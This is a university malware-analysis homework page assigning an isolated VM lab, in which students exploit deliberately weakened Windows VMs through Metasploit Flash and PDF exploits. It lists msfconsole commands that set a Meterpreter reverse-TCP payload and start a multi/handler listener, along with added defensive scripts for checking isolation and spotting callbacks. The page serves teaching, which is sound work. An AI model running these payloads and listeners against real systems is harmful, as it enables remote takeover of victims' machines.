CS6038/CS5138 Malware Analysis, UC

Course content for UC Malware Analysis

25 January 2018

VM Setup, Virtual Networking, Traffic Capture

HW01: VM Setup, Virtual Networking, Traffic Capture

For this homework assignment, you will be expected to build and run an “attack lab” similar to that demonstrated during the Week 1 & 2 lecture sets.

As your assignment submission, you will draft a report that describes the steps taken, the findings (where applicable), and any artifacts produced.

For this lab, you should use either of the following networking approaches for your lab VMs:

Feel free to use NAT to get something from the Internet onto your VM; just remember to switch it back to one of the above isolated networking methods before executing an attack.

You will need at least two Virtual Machines running:

This assignment will involve identifying exploits and directing an attack against Windows VMs, via a Browser-based Adobe Flash exploit as well as a PDF-based exploit. You will select the exploits you wish to use. Note that you may need to experiment with different versions of Windows and applications to achieve success. You may also end up picking a different exploit after initial tries fail. Also, you may find that you cannot use the same version of Windows for both attacks. In this case, feel free to use different versions of Windows for the attacks.

Establish communicating VMs

Configure both of your VMs to run on the same network. You will either need to configure the DHCP server for VirtualBox’s Host-Only networking, or alternately you may use static IP address assignment.
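Before running an attack it is worth confirming, rather than assuming, that every lab VM is attached to an isolated network and that they are all on the same one. The script below is an added example, not part of the course page: it parses the output of `VBoxManage showvminfo <vm> --machinereadable` (which prints lines like `nic1="hostonly"` and `hostonlyadapter1="vboxnet0"`) and reports any NIC left on NAT or bridged mode, or VMs that ended up on different host-only/internal networks. The VM names and the two sample outputs are constructed for the example.

```python
"""Added example, not from the course page: verify that lab VMs sit on an
isolated VirtualBox network and share it, before any attack is launched.

The check parses `VBoxManage showvminfo <vm> --machinereadable`, which prints
key="value" lines such as nic1="hostonly" and hostonlyadapter1="vboxnet0".
The VM names and the two sample outputs below are constructed for the example.
"""
import re
import subprocess

# NIC attachment modes that keep traffic inside the lab; "nat" and "bridged"
# can reach the host's real network or the Internet.
ISOLATED_MODES = {"hostonly", "intnet"}

# Constructed sample output, in the shape VBoxManage prints it.
SAMPLE_KALI = '''name="kali-lab"
nic1="hostonly"
hostonlyadapter1="vboxnet0"
cableconnected1="on"
nic2="none"
'''
SAMPLE_WIN = '''name="win7-victim"
nic1="nat"
cableconnected1="on"
nic2="none"
'''

_KV = re.compile(r'^([A-Za-z0-9_.-]+)="?(.*?)"?$')


def parse_vminfo(text):
    """Turn machine-readable VBoxManage output into a {key: value} dict."""
    info = {}
    for line in text.splitlines():
        m = _KV.match(line.strip())
        if m:
            info[m.group(1)] = m.group(2)
    return info


def nic_attachments(info):
    """Return {nic_index: (mode, network_name)} for every attached NIC."""
    nics = {}
    for key, mode in info.items():
        m = re.fullmatch(r"nic(\d+)", key)
        if not m or mode == "none":
            continue
        idx = m.group(1)
        if mode == "hostonly":
            net = info.get(f"hostonlyadapter{idx}", "")
        elif mode == "intnet":
            net = info.get(f"intnet{idx}", "")
        else:
            net = ""
        nics[idx] = (mode, net)
    return nics


def isolation_problems(vm_infos):
    """List anything that breaks isolation or keeps the VMs apart.

    vm_infos maps a VM name to its parsed info dict. An empty list means every
    NIC is isolated and all VMs share one network, so they can talk only to
    each other.
    """
    problems = []
    networks = set()
    for name, info in vm_infos.items():
        nics = nic_attachments(info)
        if not nics:
            problems.append(f"{name}: no NIC attached")
        for idx, (mode, net) in nics.items():
            if mode in ISOLATED_MODES:
                networks.add((mode, net))
            else:
                problems.append(f"{name}: nic{idx} is '{mode}', not isolated")
    if len(networks) > 1:
        problems.append(f"VMs are on different networks: {sorted(networks)}")
    return problems


def check_live_vms(vm_names):
    """Query a running VirtualBox install (needs VBoxManage on PATH)."""
    infos = {}
    for vm in vm_names:
        out = subprocess.run(
            ["VBoxManage", "showvminfo", vm, "--machinereadable"],
            capture_output=True, text=True, check=True).stdout
        infos[vm] = parse_vminfo(out)
    return isolation_problems(infos)


if __name__ == "__main__":
    sample = {"kali-lab": parse_vminfo(SAMPLE_KALI),
              "win7-victim": parse_vminfo(SAMPLE_WIN)}
    for line in isolation_problems(sample) or ["OK: all VMs isolated on one network"]:
        print(line)
```

Run against the constructed samples it reports that the Windows VM is still on NAT; with real VMs, call `check_live_vms(["kali-lab", "win7-victim"])` (substituting your own VM names) and only proceed when it returns an empty list.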

If you end up having different Windows VMs for your different exploits, then document both of the configurations here. This is the only way I will be able to attempt to recreate your steps.

Unsecuring your VMs

You will need to render your Windows VMs and the applications within them insecure. Some of this was demonstrated in class; making the equivalent configuration changes to the applications and OSes used in this assignment is left as an exercise for the student.

Launch attack using Flash browser exploit

Choose a Flash exploit to use for launching an attack against a Windows VM. Document how you configured it.

The following command can be run in msfconsole to identify Adobe Flash exploits:

search type:exploit platform:windows adobe_flash

Make sure that you are using the meterpreter reverse shell payload:

set PAYLOAD windows/meterpreter/reverse_tcp

Don’t forget to set your LHOST option, as well as any others, correctly, such as SRVHOST and URIPATH.

Document the steps taken to build your attack.

Extract the files used in your attack (HTML, SWF, etc.) and document basic information about them (file sizes, names, URL names, etc.).

You may need to use wireshark, tcpdump and/or tcpflow to extract these files from an active download:
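Once tcpflow has split the capture into per-direction stream files, the documentation step can be scripted. The script below is an added example, not part of the course page: it reads the client-to-server stream (the HTTP requests) and the server-to-client stream (the responses), pairs them in order, and records for every delivered file the URL, Content-Type, size, SHA-256 and the file type read from its magic bytes (SWF, PDF, PE, HTML). Both streams are constructed for the example: the server address matches the lab host-only network and the file names are placeholders. It assumes body-less requests and Content-Length framed responses, which is what a simple Metasploit browser-exploit server produces.

```python
"""Added example, not part of the course page: document the files recovered
from a captured HTTP download.

tcpflow writes each direction of a TCP connection to its own file. This script
takes the client->server stream (the requests) and the server->client stream
(the responses), pairs them in order, and records for every response body the
URL, Content-Type, size, SHA-256 and the file type read from its magic bytes.
Both streams below are constructed for the example.
"""
import hashlib
import re

HTML_BODY = b"<html><body><object data='payload.swf'></object></body></html>"
SWF_BODY = b"CWS\x0f" + b"\x00" * 28   # "CWS" = zlib-compressed Flash header

REQUEST_STREAM = (
    b"GET /index.html HTTP/1.1\r\nHost: 192.168.56.101:8080\r\n\r\n"
    b"GET /payload.swf HTTP/1.1\r\nHost: 192.168.56.101:8080\r\n\r\n"
)


def _response(ctype, body):
    return (b"HTTP/1.1 200 OK\r\nContent-Type: " + ctype
            + b"\r\nContent-Length: " + str(len(body)).encode()
            + b"\r\n\r\n" + body)


RESPONSE_STREAM = (_response(b"text/html", HTML_BODY)
                   + _response(b"application/x-shockwave-flash", SWF_BODY))

MAGIC = [
    (b"%PDF-", "pdf"),
    (b"FWS", "swf (uncompressed)"),
    (b"CWS", "swf (zlib-compressed)"),
    (b"ZWS", "swf (lzma-compressed)"),
    (b"MZ", "pe executable"),
]


def sniff_type(data):
    """Classify a body by magic bytes; HTML is recognised by its first tag."""
    for sig, name in MAGIC:
        if data.startswith(sig):
            return name
    if re.match(rb"\s*<(!doctype|html)", data, re.IGNORECASE):
        return "html"
    return "unknown"


def _headers(lines):
    return {k.strip().lower(): v.strip()
            for k, v in (l.split(b":", 1) for l in lines if b":" in l)}


def parse_requests(stream):
    """Yield (method, path, host) per request; assumes body-less requests."""
    for block in stream.split(b"\r\n\r\n"):
        if not block.strip():
            continue
        lines = block.split(b"\r\n")
        method, path, _version = lines[0].split(b" ", 2)
        host = _headers(lines[1:]).get(b"host", b"")
        yield method.decode(), path.decode(), host.decode()


def parse_responses(stream):
    """Yield (status_line, headers, body) per Content-Length framed response."""
    pos = 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end < 0:
            break
        lines = stream[pos:end].split(b"\r\n")
        headers = {k.decode(): v.decode() for k, v in _headers(lines[1:]).items()}
        length = int(headers.get("content-length", "0"))
        body = stream[end + 4:end + 4 + length]
        yield lines[0].decode(), headers, body
        pos = end + 4 + length


def document_download(request_stream, response_stream):
    """Pair requests with responses and describe each delivered file."""
    records = []
    pairs = zip(parse_requests(request_stream), parse_responses(response_stream))
    for (method, path, host), (status, headers, body) in pairs:
        records.append({
            "url": f"http://{host}{path}",
            "method": method,
            "status": status,
            "content_type": headers.get("content-type", ""),
            "filename": path.rsplit("/", 1)[-1] or "(index)",
            "size": len(body),
            "sha256": hashlib.sha256(body).hexdigest(),
            "type": sniff_type(body),
        })
    return records


def document_tcpflow_files(request_path, response_path):
    """Same, reading the two stream files tcpflow wrote to disk."""
    with open(request_path, "rb") as req, open(response_path, "rb") as resp:
        return document_download(req.read(), resp.read())


if __name__ == "__main__":
    for rec in document_download(REQUEST_STREAM, RESPONSE_STREAM):
        print(rec)
```

The magic-byte check matters because the Content-Type header is whatever the server chose to send; recording both lets the report show when they disagree. Chunked transfer encoding is not handled here, so check the response headers of a real capture before trusting the pairing.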

Launch attack using PDF exploit

Choose a PDF exploit to use for launching an attack against a Windows VM. Document how you configured it.

The following command can be run in msfconsole to identify Adobe Acrobat Reader exploits:

search type:exploit platform:windows acrobat

Make sure that you are using the meterpreter reverse shell payload:

set PAYLOAD windows/meterpreter/reverse_tcp

Don’t forget to set your LHOST option, as well as any others, correctly, such as SRVHOST and URIPATH.

Document the steps taken to build your attack.

Listening for incoming shells

You may run into a situation where Metasploit isn’t actively listening for connections when some PDFs are generated. In this situation, it is necessary to start up the Meterpreter listener yourself:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (your kali IP)
run

You’ll see a message like the one below, telling you it is working:

[*] Started reverse TCP handler on 192.168.56.101:4444
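The callback that this handler waits for is also visible in the traffic capture, and recognising it is a useful part of documenting the attack. The script below is an added example, not part of the course page: it parses `tcpdump -n` output, picks out the initial SYN of any new connection to the handler port (4444 in the message above), and pairs it with the HTTP request the same victim made shortly before, which is the drive-by-then-callback sequence a defender would look for. The capture lines are constructed for the example and use the lab's host-only addresses.

```python
"""Added example, not from the course page: find the reverse-shell callback in
a `tcpdump -n` capture of the lab.

Once the handler is listening, a successful exploit makes the victim open a
new TCP connection to the attacker on the handler port. The capture below is
constructed: the victim fetches the exploit page over HTTP from the Kali VM,
then a few seconds later connects to port 4444.
"""
import re
from datetime import datetime

SAMPLE_TCPDUMP = """\
12:00:01.000100 IP 192.168.56.102.49152 > 192.168.56.101.8080: Flags [S], seq 1, win 8192, length 0
12:00:01.000300 IP 192.168.56.101.8080 > 192.168.56.102.49152: Flags [S.], seq 2, ack 2, win 65535, length 0
12:00:01.001000 IP 192.168.56.102.49152 > 192.168.56.101.8080: Flags [P.], seq 2:120, ack 1, win 8192, length 118: HTTP: GET /index.html HTTP/1.1
12:00:04.500000 IP 192.168.56.102.49153 > 192.168.56.101.4444: Flags [S], seq 9, win 8192, length 0
12:00:04.500200 IP 192.168.56.101.4444 > 192.168.56.102.49153: Flags [S.], seq 10, ack 10, win 65535, length 0
"""

_LINE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
    r"(?:.*HTTP: (?P<http>\S+ \S+))?")


def parse_tcpdump(text):
    """Parse tcpdump -n lines into dicts; unrecognised lines are skipped."""
    packets = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        p = m.groupdict()
        p["ts"] = datetime.strptime(p["ts"], "%H:%M:%S.%f")
        p["sport"], p["dport"] = int(p["sport"]), int(p["dport"])
        packets.append(p)
    return packets


def find_callbacks(packets, handler_port, window_seconds=60):
    """Flag new connections to handler_port, together with any HTTP request
    the same source made within window_seconds beforehand."""
    findings = []
    for p in packets:
        if p["flags"] != "S" or p["dport"] != handler_port:
            continue   # only the initial SYN, only towards the handler port
        prior = [q for q in packets
                 if q["http"] and q["src"] == p["src"] and q["ts"] <= p["ts"]
                 and (p["ts"] - q["ts"]).total_seconds() <= window_seconds]
        findings.append({
            "victim": p["src"],
            "handler": f"{p['dst']}:{p['dport']}",
            "at": p["ts"].time().isoformat(),
            "preceded_by": [q["http"] for q in prior],
            "seconds_after_download":
                (p["ts"] - prior[-1]["ts"]).total_seconds() if prior else None,
        })
    return findings


if __name__ == "__main__":
    for f in find_callbacks(parse_tcpdump(SAMPLE_TCPDUMP), handler_port=4444):
        print(f)
```

On a real capture, feed the output of `tcpdump -n -r capture.pcap` to `parse_tcpdump` and pass the port your handler reported; the `preceded_by` list ties the callback back to the download documented earlier in the report.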

For both attacks

Execute a few commands in Meterpreter. What do they return? What is their purpose? Can you upload and download files from the compromised system? Can you execute programs?

You may need to use wireshark, tcpdump and/or tcpflow to extract these files from an active download:

Submit your report to the appropriate HW assignment on Blackboard. If you have any supporting program files or artifacts, ZIP them up into a single archive and upload that to Blackboard as well. However, upload your finished report unzipped as its own file, so the in-Blackboard viewer can display it.

tags: malware assignment